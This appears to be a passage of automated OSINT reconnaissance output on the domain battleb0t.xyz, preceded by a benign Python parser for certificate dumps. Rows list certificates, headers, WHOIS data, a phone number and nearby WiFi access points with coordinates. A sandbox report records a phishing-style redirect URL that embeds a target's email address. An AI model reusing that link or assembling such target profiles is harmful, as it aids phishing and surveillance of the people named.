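Both certificate dumps above (the Let's Encrypt one for nwapi.battleb0t.xyz from the DNS Resolver row and the Google Trust Services wildcard from the CertSpotter row) carry a critical `CT Precertificate Poison` extension, which means they are the precertificates submitted to Certificate Transparency logs, not the leaf certificates a live server would present. The following is an added example, not part of the scan output: a parser for this `openssl x509 -text` style layout that pulls out the fields an analyst checks first (serial, issuer, subject, SANs, validity window, key size, poison flag) and a name-matching helper that applies the single-label wildcard rule. `SAMPLE_DUMP` is constructed from the `*.battleb0t.xyz` entry above with the modulus and signature bytes left out; the field set and the text-based poison check are this example's own simplifications, not a substitute for decoding the DER.

```python
import re
from datetime import datetime, timezone

# Constructed sample: the *.battleb0t.xyz precertificate from the scan
# output above, with the modulus and signature bytes left out.
SAMPLE_DUMP = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
        Validity
            Not Before: Mar 23 22:37:05 2023 GMT
            Not After : Jun 21 22:37:04 2023 GMT
        Subject: CN=*.battleb0t.xyz
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                RSA Public-Key: (2048 bit)
        X509v3 extensions:
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage:
                TLS Web Server Authentication
            X509v3 Subject Alternative Name:
                DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
            CT Precertificate Poison: critical
                NULL
"""


def _value(text, label):
    """Value of the first `label:` line.  openssl puts long values
    (serial number, SAN list) on the line after the label."""
    lines = [ln.strip() for ln in text.splitlines()]
    pat = re.compile(r"^" + re.escape(label) + r"\s*:\s*(.*)$")
    for i, ln in enumerate(lines):
        m = pat.match(ln)
        if m:
            if m.group(1):
                return m.group(1)
            return lines[i + 1] if i + 1 < len(lines) else None
    return None


def _openssl_time(s):
    # openssl prints validity as e.g. "Mar 23 22:37:05 2023 GMT"
    return datetime.strptime(s, "%b %d %H:%M:%S %Y %Z").replace(tzinfo=timezone.utc)


def parse_cert_dump(text):
    not_before = _openssl_time(_value(text, "Not Before"))
    not_after = _openssl_time(_value(text, "Not After"))
    bits = re.search(r"\((\d+) bit\)", _value(text, "RSA Public-Key") or "")
    san_line = _value(text, "X509v3 Subject Alternative Name") or ""
    return {
        "serial": _value(text, "Serial Number"),
        "issuer": _value(text, "Issuer"),
        "subject": _value(text, "Subject"),
        "not_before": not_before,
        "not_after": not_after,
        "lifetime_days": (not_after - not_before).days,
        "key_bits": int(bits.group(1)) if bits else None,
        "sans": re.findall(r"DNS:([^,\s]+)", san_line),
        # The poison extension marks a CT precertificate.  It is what the
        # log holds, never the leaf a server serves, so do not read it as
        # proof that the name is live or that this key is deployed.
        "is_precert": "CT Precertificate Poison" in text,
    }


def san_matches(sans, hostname):
    """RFC 6125-style name check: a wildcard covers exactly one leftmost
    label, so *.battleb0t.xyz matches nwapi.battleb0t.xyz but neither
    battleb0t.xyz (needs its own SAN) nor a.b.battleb0t.xyz."""
    host = hostname.lower().rstrip(".")
    for san in sans:
        san = san.lower()
        if san.startswith("*."):
            suffix = san[1:]  # ".battleb0t.xyz"
            prefix = host[: -len(suffix)] if host.endswith(suffix) else ""
            if prefix and "." not in prefix:
                return True
        elif san == host:
            return True
    return False


def is_valid_on(cert, iso_date):
    """True if the ISO-8601 instant (UTC assumed if naive) lies inside
    the certificate's validity window."""
    when = datetime.fromisoformat(iso_date)
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return cert["not_before"] <= when <= cert["not_after"]


if __name__ == "__main__":
    cert = parse_cert_dump(SAMPLE_DUMP)
    for k, v in cert.items():
        print(f"{k:14} {v}")
    print("covers nwapi.battleb0t.xyz:", san_matches(cert["sans"], "nwapi.battleb0t.xyz"))
```

Run against the sample, the parser reports a 2048-bit key, an 89-day window ending 2023-06-21 (so it was in its window on the 2023-05-12 scan date and expired before the Let's Encrypt one for nwapi.battleb0t.xyz, which runs to 2023-06-25), SANs covering both the wildcard and the bare apex, and `is_precert` set. For a real investigation the next step is to fetch the served leaf from the host and compare its serial and SPKI against the logged precertificate rather than trusting the CT record alone.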
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Seattle, Washington, 98108, United States, North America |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abc@allianzgi.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_330_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_330_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_330_IESQMMUTEX_0_519"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_330_ConnHashTable<816>_HashTable_Mutex"\n "IsoScope_330_IE_EarlyTabStart_0x690_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_330_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_816"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, 
u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.43.150:443"\n "185.88.152.184:443"\n "35.186.254.174:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com" as clean (type is "HTML document ASCII text")\n Antivirus vendors marked dropped file "TarBB6A.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarBA30.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabBA1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabBB69.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 
bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "TarBB6A.tmp" has type "data"- Location: [%TEMP%\\TarBB6A.tmp]- [targetUID: 00000000-00002892]\n "_9E69994D-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002892]\n "~DF41FFD31729A203FF.TMP" has type "data"- Location: [%TEMP%\\~DF41FFD31729A203FF.TMP]- [targetUID: 00000000-00000816]\n "RecoveryStore._9E69994B-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "6JGINI9K.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6JGINI9K.txt]- [targetUID: 00000000-00000816]\n "J0N78Y0C.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\J0N78Y0C.txt]- [targetUID: 00000000-00000816]\n "CabBA1F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBA1F.tmp]- [targetUID: 00000000-00002892]\n "S35ZJMPU.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S35ZJMPU.txt]- 
[targetUID: 00000000-00000816]\n "MYW52O1X.htm" has type "HTML document ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\37NU00GP\\MYW52O1X.htm]- [targetUID: 00000000-00002892]\n "flare_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "CabBB69.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabBB69.tmp]- [targetUID: 00000000-00002892]\n "_A7F3014A-BE57-11ED-B6C3-080027D6CFFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFF51E1B1269B03A86.TMP" has type "data"- Location: [%TEMP%\\~DFF51E1B1269B03A86.TMP]- [targetUID: 00000000-00000816]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "MUID1C5CECAFE62F66650020FE60E76367DFmsn.com/1025229670643231098083270159623031019620*"\n Heuristic match: "api.salesflare.com"\n Pattern match: 
"https://api.salesflare.com/,a=new"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.comAccept-Language"\n Heuristic match: "hctp_://rabet_anatkoo_ha.com"\n Pattern match: "https://llink.toaccess-control-allow-credentials"\n Pattern match: "https://llink.to"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025319012595231055838270143998031019620*"\n Pattern match: "MUIDB0843E9110DDB6B4E0942FBDE0C5F6A01ieonline.microsoft.com/9216229670643231098083269878373031019620*"\n Heuristic match: "rabetsanatkoosha.com"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*MUID0843E9110DDB6B4E0942FBDE0C5F6A01microsoft.com/1025229670643231098083269862748031019620*_EDGE_V1microsoft.com/9216229670643231098083269878373031019620*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*MUID0843E9110DDB6B4E0942FBDE0C5F6A01microsoft.com/1025229670643231098083269862748031019620*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA6"\n Pattern match: "SUIDMmicrosoft.com/9216216421721631019729269862748031019620*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "www.msn.com/"\n Pattern match: "https://rabetsanatkoosha.com/SNS/allianzgi.com/aBC@allianzgi.com"\n Pattern match: "llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Heuristic match: "ianzgi.com"\n Heuristic match: "link.to"\n Heuristic match: 
"u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fallianzgi.com%2FaBC%40allianzgi.com"\n Heuristic match: "api.ipify.org"\n Heuristic match: "checkip.amazonaws.com"\n Heuristic match: "checkip.dyndns.com"\n Heuristic match: "checkip.dyndns.org"\n Heuristic match: "checkip.org"\n Heuristic match: "checkmyip.com"\n Heuristic match: "cmyip.com"\n Heuristic match: "curlmyip.com"\n Heuristic match: "findmyip.org"\n Heuristic match: "formyip.com"\n Heuristic match: "geoip.co.uk"\n Heuris |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Host": ["87.248.157.102:2079"], "Server": ["cPanel"], "Connection": ["close"], "Www_Authenticate": ["Basic realm=\"Horde DAV Server\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | motorola 8A4 (Net ID: 00:0C:E5:4D:D8:A4) | 39.0469, -77.4903 |
| 2023-05-12 03:09:34 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 211.30.196.104.bc.googleusercontent.com | 104.196.30.211 |
| 2023-05-12 02:56:51 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | oldfluid.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:34:48:36:b2:51:77:1f:45:f7:ca:23:53:09:6b:f8:20:f7
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:18 2022 GMT
Not After : Mar 27 01:46:17 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
73:BD:0E:B3:ED:9F:6A:FE:37:97:44:54:03:BB:B6:CC:83:95:C8:48
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:46:18.221 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:46:18.274 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:D6:A2) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abusecomplaints@markmonitor.com | Domain Name: GITHUBUSERCONTENT.COM
Registry Domain ID: 1845671923_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-01-05T09:12:39Z
Creation Date: 2014-02-06T21:17:00Z
Registry Expiry Date: 2024-02-06T21:17:00Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P01.NSONE.NET
Name Server: DNS2.P01.NSONE.NET
Name Server: DNS3.P01.NSONE.NET
Name Server: DNS4.P01.NSONE.NET
Name Server: NS-1411.AWSDNS-48.ORG
Name Server: NS-181.AWSDNS-22.COM
Name Server: NS-1867.AWSDNS-41.CO.UK
Name Server: NS-596.AWSDNS-10.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
|
| 2023-05-12 02:54:16 | HTTP Headers | No | Web Spider | 6 | 0 | 2 | 0 | None | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} | oldfluid.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | postcrossing (Category: social)
https://www.postcrossing.com/user/login | login |
| 2023-05-12 02:56:50 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Dec 18 22:24:59.092 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 18 22:24:59.634 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:09:5B:FC:D9:A0) | 39.0469, -77.4903 |
| 2023-05-12 03:11:26 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14806242599', u'local': u'(480) 624-2599'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14806242599', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14806242599 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Picsart (Category: art)
https://picsart.com/u/login | login |
| 2023-05-12 02:45:34 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | battleb0t.xyz. 86400 IN NS daphne.ns.cloudflare.com.
battleb0t.xyz. 86400 IN NS skip.ns.cloudflare.com. | battleb0t.xyz |
| 2023-05-12 02:54:34 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5de9314c41108c-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.71.14 |
| 2023-05-12 03:03:28 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 001cat.github.io |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 46.101.229.70 |
| 2023-05-12 02:45:50 | Physical Location | No | AbstractAPI | 1 | 0 | 2 | 0 | None | Montreal, Quebec, H4X, United States, North America | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:54:07 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SWKIDNEY1 (Net ID: 00:02:6F:ED:54:F8) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F6:1A:16) | 41.8781, -87.6298 |
| 2023-05-12 02:54:44 | Netblock Membership | No | Censys | 0 | 0 | 3 | 0 | None | 35.229.48.0/20 | 35.229.48.116 |
